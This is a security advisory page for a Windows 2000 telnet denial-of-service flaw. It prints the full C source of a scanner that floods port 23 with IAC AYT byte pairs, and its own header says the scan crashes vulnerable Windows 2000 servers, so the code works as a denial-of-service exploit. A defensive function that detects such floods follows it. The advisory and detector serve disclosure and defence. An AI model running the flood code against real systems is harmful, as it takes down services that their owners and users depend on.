
Windows 2000 TELNET Denial-of-Service Vulnerability


Published: 2001-07-27
Updated: 2001-07-27
Severity:
Threat level: remote denial of service
Error type: input validation error
Exploitation mode: server mode

Affected systems
W2K
Detailed description
The Windows TELNET service has an AYT vulnerability that can be used to cause a denial of service.

Test code
/*
* Telnetd AYT overflow scanner, by Security Point(R)
*              Bug found by scut of TESO Security
*
* Date: 25/07/01
* Author: Security Point(R)
* WWW: http://www.secpoint.com
* Email: info@secpoint.com
*
* This program checks for the AYT overflow related to the
* newly discovered telnetd vulnerabilities.
*
* Tested against:
*    Vulnerable:
*        netkit-telnet-0.10
*              FreeBSD 4.2
*              Windows 2000 Service Pack2 Telnet service will
*              crash when scanned.
*    Not vulnerable:
*        netkit-telnet-0.17
*
*      
*
* Please keep us updated with the OS's that you check, and
* report back to us on info@secpoint.com, whether the system
* is vulnerable or not. So we can construct a full list
* of vulnerable systems.
*
*
* This source code is for educational purpose ONLY,
* Security Point(R) will not be responsible for any damages
* whatsoever that have a connection with this code. There are
* no warranties with regard to this information.
*
* Are your networks under attack at this moment?
*
* With Security Point(R) Scanner you can find and repair the
* Vulnerabilities before the bad guys get in.
*
* Please see http://www.secpoint.com/solutions.php
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>   /* bcopy, bzero */
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>


struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

/* SIGALRM handler: cancel any pending alarm and record the timeout. */
void handle_alarm(int signum) {
    alarm(0);
    timeout=1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
        printf("Usage: %s <host>\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(EXIT_FAILURE);
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
        perror("socket");
        exit(EXIT_FAILURE);
    }
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_family=AF_INET;
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
        perror("connect");
        exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n");
    printf("Sending telnet options... stand by...\n");
    signal(SIGALRM,handle_alarm);

    /* Fill the buffer with IAC AYT pairs. Bytes are written directly:
     * the original self-referencing sprintf() overlapped its own source
     * and wrote a terminating NUL one byte past the end of the buffer. */
    bzero(sendbuffer,sizeof(sendbuffer));
    for (i=0;i<(int)sizeof(sendbuffer);i+=2) {
        sendbuffer[i]   = (char)255; // 0xff - IAC
        sendbuffer[i+1] = (char)246; // 0xf6 - AYT
    }

    /* Read the server's initial option negotiation before sending. */
    alarm(60);
    read(sock, buffer, sizeof(buffer));
    alarm(0);

    /* The buffer is not NUL-terminated, so send its full size. */
    write(sock, sendbuffer, sizeof(sendbuffer));

    bzero(buffer,sizeof(buffer));

    /* No reply (connection closed or read error) is reported as vulnerable. */
    alarm(60);
    if (read(sock, buffer, sizeof(buffer)) <=0) {
        printf("Telnetd on %s vulnerable\n",argv[1]);
        exit(EXIT_SUCCESS);
    }
    alarm(0);
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    exit(EXIT_SUCCESS);
}

Solution
Disable the service.
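
The test code above sends a long run of IAC AYT (0xff 0xf6) pairs. As an added example (not part of the original advisory or the Security Point code), the following C function counts AYT commands in a captured client-to-server telnet byte stream so that a monitor can flag such a run; the function names and the threshold of 64 are assumptions.

```c
#include <stddef.h>
#include <stdio.h>

/* Telnet command bytes (RFC 854). */
enum { IAC = 255, DONT = 254, DO = 253, WONT = 252, WILL = 251,
       SB = 250, AYT = 246, SE = 240 };

/* Assumed threshold: tune to what legitimate clients send on your network. */
#define AYT_FLOOD_THRESHOLD 64

/* Count IAC AYT commands in a client-to-server byte stream.
 * Skips escaped data bytes (IAC IAC), option negotiation (IAC WILL/WONT/
 * DO/DONT <opt>) and subnegotiation payloads (IAC SB ... IAC SE) so that
 * 0xf6 bytes appearing there are not miscounted. */
size_t count_iac_ayt(const unsigned char *buf, size_t len)
{
    size_t i = 0, count = 0;
    int in_sb = 0;

    while (i < len) {
        if (buf[i] != IAC) { i++; continue; }        /* plain data byte */
        if (i + 1 >= len) break;                     /* truncated command */
        unsigned char cmd = buf[i + 1];
        if (cmd == IAC) { i += 2; continue; }        /* escaped 0xff */
        if (in_sb) {
            if (cmd == SE) in_sb = 0;                /* end of subnegotiation */
            i += 2;
            continue;
        }
        if (cmd == SB) { in_sb = 1; i += 2; }
        else if (cmd >= WILL && cmd <= DONT) i += 3; /* skip option byte */
        else { if (cmd == AYT) count++; i += 2; }
    }
    return count;
}

int is_ayt_flood(const unsigned char *buf, size_t len)
{
    return count_iac_ayt(buf, len) > AYT_FLOOD_THRESHOLD;
}

int main(void)
{
    /* Constructed sample: one negotiation, one AYT, then typed text. */
    const unsigned char sample[] = { IAC, DO, 1, IAC, AYT, 'l', 's', '\r', '\n' };
    printf("AYT count: %zu, flood: %d\n", count_iac_ayt(sample, sizeof sample),
           is_ayt_flood(sample, sizeof sample));
    return 0;
}
```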

Related information